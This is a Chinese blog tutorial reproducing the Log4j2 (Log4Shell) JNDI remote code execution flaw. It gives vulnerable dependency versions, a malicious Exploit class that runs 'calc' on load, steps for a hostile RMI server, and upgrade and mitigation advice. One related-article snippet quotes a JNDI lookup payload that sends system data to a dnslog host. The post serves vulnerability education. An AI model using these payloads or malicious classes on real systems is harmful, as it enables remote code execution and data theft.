手把手教你复现Log4j2核弹级漏洞

最新推荐文章于 2024-05-19 19:56:17 发布
置顶 最新推荐文章于 2024-05-19 19:56:17 发布
阅读量3.5k 收藏 2
点赞数 3
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wusimin432503/article/details/121953327
版权

简介

        近日, Apache Log4j 的远程代码执行漏洞细节被公开,该漏洞一旦被攻击者利用会造成严重危害。经过快速分析和确认,该漏洞影响范围极其广泛,危害极其严重,建议第一时间启动应急响应进行修复。

漏洞概述

        Apache Log4j2 是一款开源的 Java 日志记录工具,大量的业务框架都使用了该组件。此次漏洞是用于 Log4j2 提供的 lookup 功能造成的,该功能允许开发者通过一些协议去读取相应环境中的配置。但在实现的过程中,并未对输入进行严格的判断,从而造成漏洞的发生。

影响范围

Apache Log4j 2.x <= 2.15.0-rc1

漏洞复现

1.环境搭建

        创建一个新的maven项目,并导入Log4j的依赖包

<dependencies>
    <dependency>
            <groupId>org.apache.logging.log4j</groupId>
            <artifactId>log4j-api</artifactId>
            <version>2.11.0</version>
    </dependency>
    <dependency>
            <groupId>org.apache.logging.log4j</groupId>
            <artifactId>log4j-core</artifactId>
            <version>2.11.0</version>
    </dependency>
</dependencies>

 2.漏洞利用,使用Log4jTest.java测试 

 3.编译一恶意类Exploit.class

首先新建Exploit.java,然后编译为class文件。

class Exploit {
    static {
        System.err.println("Evil has been there");
        try{
            String cmds="calc";
            Runtime.getRuntime().exec(cmds);
        }catch(Exception e){
            e.printStackTrace();
        }
    }
}

 4.黑客后台创建一个RMI服务,绑定Exploit,并执行开启1099监听端口

5.运行Log4jTest.java即可访问恶意类并执行写在其中的"calc"命令

 

修复方式

        目前,Apache官方已发布新版本完成漏洞修复,建议用户尽快进行自查,并及时升级至最新版本:

https://github.com/apache/logging-log4j2/releases/tag/log4j-2.15.0-rc2

建议同时采用如下临时措施进行漏洞防范:

  • 添加jvm启动参数-Dlog4j2.formatMsgNoLookups=true;

  • 在应用classpath下添加log4j2.component.properties配置文件,文件内容为log4j2.formatMsgNoLookups=true;

  • JDK使用11.0.1、8u191、7u201、6u211及以上的高版本;

  • 部署使用第三方防火墙产品进行安全防护。

参考链接:

https://www.bilibili.com/video/BV1FL411E7g3

https://mp.weixin.qq.com/s/AqbGHYHLhRemxmroi2W6Iw

技术交流

源码放在评论区

欢迎转载、收藏、有所收获点赞支持一下!

dafeng2773
关注
  • 3
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
航拍大师手把手你电影航拍视频课程下载整理.zip
08-21
航拍大师手把手你电影航拍【视频课程】下载整理.zip含下载地址可存云盘
手把手复现Log4j2漏洞,千万别中招!
weixin_45727359的博客
12-19 304
来源:blog.csdn.net/qq_40989258/article/details/1218623630x00 简介ApacheLog4j2是一个开源的Java日志框架,被广泛地应用...
手把手复现apache log4j2 漏洞
叶新东老师的博客
12-15 4531
前言 因为log4j2是java的日志框架, 所在这边也使用java进行测试,需要注意的是,log4j2的版本从2.0 ~ 2.14.1之间都是有安全漏洞的, 在2.15版本(包含2.15)后就已经修复了这个漏洞;所以我们在复现时只要版本不超过2.15即可; 准备 在复现前,需要先准备以下几样东西 nginx:无版本限制 Intellij idea :用来编写jmdi 服务端代码,和测试log日志 log4j 依赖:(maven自动下载) 开整 因为是远程执行漏洞嘛,所以肯定需要用到不同的工程,这里准备
千万别中招!手把手复现Log4j2漏洞!
欢迎关注公众号:【码农突围】,回复9999,可以获取一份LeetCode刷题笔记
03-15 269
点击上方“码农突围”,马上关注这里是码农充电第一站,回复“666”,获取一份专属大礼包 真爱,请设置“星标”或点个“在看”来源:https://blog.csdn.net/qq_40989...
复现log4j2漏洞(CVE-2021-44228)
qq_58000413的博客
09-13 898
接着我们再构造payload action=${jndi:ldap://${sys:java.version}.0tortx.dnslog.cn}cd vulhub/log4j/CVE-2021-44228 进入目录里。docker-compoes up -d 开启环境。docker-compoes ps 查看对应的端口。可以看到端口在8983上,我们到服务器防火墙打开8983。出现java版本,则存在命令执行漏洞
引爆全球的 Log4j2 核弹漏洞,JNDI 到底是个什么鬼?
Java技术栈,分享最主流的Java技术
01-10 428
背景 前段时间,Log4j2, Logback 日志框架频频爆雷: 炸了!Log4j2 再爆漏洞,v2.17.1 横空出世。。。 Logback 也爆雷了,惊爆了。。。 究其原因,很大一部分就是因为 JNDI 这个玩意。。。 JNDI JNDI:Java Naming and Directory Interface,即:Java 命名和目录接口,它专为 Java 应用程序提供命名和目录功能。 JNDI 架构图: 如图,JNDI 包含以下两部分: 1)JNDI API: Java 应用程序即是通过 J
航拍大师手把手你电影航拍-网盘链接提取码下载 .txt
02-10
如果你是小白,你将获得系统专业的航拍基本功练习体系和机器配件的选择,避免前期入门走弯路,有效减少学习时间成本和器材投入成本。如果你是从业人员,你将系统的掌握巩固航拍的理论知识,查缺补漏,让你的经验和...
手把手你学dsp2812,手把手你学dsp2812pdf下载,C,C++
09-10
手把手你学2812,很全面的一本书。电子版,适合初学者学习,
手把手你使用log4j
03-28
你如何使用log4j,有详细代码,图解等。
手把手你创造第一个自己的GPTs应用.pdf
11-13
手把手你创造第一个自己的GPTs应用.pdf
Log4j2 RCE漏洞及靶场搭建
weixin_51387754的博客
12-11 6108
漏洞简介 Apache Log4j2是一款Java日志框架,是Log4j 的升版。可以控制每一条日志的输出格式。通过定义每一条日志信息的别,能够更加细致地控制日志的生成过程。该漏洞是由于Apache Log4j2某些功能存在递归解析功能,攻击者可利用该漏洞在未授权的情况下,构造恶意数据进行远程代码执行攻击,最终获取服务器最高权限。 目前受影响的Apache Log4j2版本: 2.0 ≤ Apache Log4j <= 2.14.1 漏洞复现 在下载镜像复现之前确保,虚拟机非处于挂起状态! 在下载
个人网站Log4j2漏洞风险排查
倚竹幽篁
01-24 2844
前言 Log4j2漏洞事件已经过去了几个月,影响面可以说是非常的广。本质上还是权限和代码注入问题,这里就不作赘述,和SQL注入在原理和形式上都异曲同工。 我个人没太明白还是,如此流行的开源库,竟然开发者和使用者这么久都没发现这个巨大漏洞(可能早有人发现但并未公布),而且作为一个日志记录工具,权限未免太高。 修复 从互联网上可以查到最新的修复建议: 升到最新版本: 目前官方已推出最新Apache log4j 2.15.0版本,可从地址中下载升:https://logging.apache.org/l
解锁Nginx跨域谜题:3步打造安全高效的CORS策略
2401_85000826的博客
05-16 411
Nginx作为一款强大的Web服务器和反向代理服务器,经常被用于处理跨域资源共享(CORS,Cross-Origin Resource Sharing)策略,以允许或限制不同源之间的资源请求。CORS是一种安全策略,用于决定Web浏览器是否应允许从一个域名加载的网页访问另一个域名下的资源。下面将深入解析如何在Nginx配置中实现对origin(请求来源)的限制,以精确控制跨域请求。
软考高架构师:软件系统安全相关概念完整性、不可否认性、可控性、机密性、安全审计
明明如月的技术博客
05-19 142
了解软件系统安全的几个重要概念:完整性、不可否认性、可控性、机密性和安全审计,可以通过一些日常生活中的例子来帮助理解。
防静电劳保鞋:工业安全中的隐形守护者
YOUSUTO的博客
05-16 435
因此,防静电措施在工业安全中显得尤为重要。在众多防静电措施中,防静电劳保鞋作为工作人员脚下的隐形守护者,发挥着不可替代的作用。防静电劳保鞋作为工业安全中的隐形守护者,在防止静电危害方面发挥着重要作用。在工业生产中,我们应该充分认识到防静电措施的重要性,并合理选择和使用防静电劳保鞋等防护用品。在电子制造、石油化工、物流运输等行业中,静电可能导致设备损坏、产品性能下降,甚至引发火灾或爆炸。而防静电劳保鞋作为工作人员日常穿着的防护用品,能够在人员走动、操作设备时,有效消除人体静电积聚,减少静电带来的潜在风险。
红队攻防渗透技术实战流程:云安全之云服务安全:ECS和RDS
HACKONE的博客
05-18 30
实例元数据(metadata)包含了弹性计算云服务器实例在阿里云系统中的信息,您可以在运行中的实例内方便地查看实例元数据,并基于实例元数据配置或管理实例。细节方面可通过访问官网找元数据访问触发说明,阿里云例子:https://help.aliyun.com/zh/ecs/user-guide/manage-instance-metadata。腾讯云元数据地址:http://metadata.tencentyun.com/CF 云渗透框架项目:https://wiki.teamssix.com/CF/
全面解析防静电措施:保障工业安全,预防静电危害
YOUSUTO的博客
05-16 369
静电是一种常见的物理现象,由于电荷的不平衡而产生。在特定的环境中,静电可能会带来危害,如损坏电子设备、引起火灾等。因此,采取适当的防静电措施是非常重要的。总之,防静电需要采取综合的措施,从环境、设备、人员等多个方面入手,才能有效地减少静电的危害。
https为何安全
最新发布
qq_38723814的博客
05-19 588
HTTPS(超文本传输安全协议)是一种用于安全通信的网络协议,它在HTTP协议的基础上通过SSL/TLS(安全套接层/传输层安全)协议来加密数据,以保护网络数据的传输安全
智慧园区EasyCVR视频智能管理方案:构建高效安全园区新视界
TSINGSEE青犀视频官方技术博客
05-15 476
睡岗离岗检测:检测消控室值班员值岗情况,当发生脱岗、睡岗等问题时,即时报警,避免发生事件无人响应情形。
手把手你alexnet复现
10-08
手把手复现AlexNet的具体步骤如下: 1. 导入所需的库和模块,包括PaddlePaddle库和相关数据处理库。 2. 准备数据集,包括下载和解压数据集,对数据进行预处理,划分训练集和验证集。 3. 定义AlexNet网络结构,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值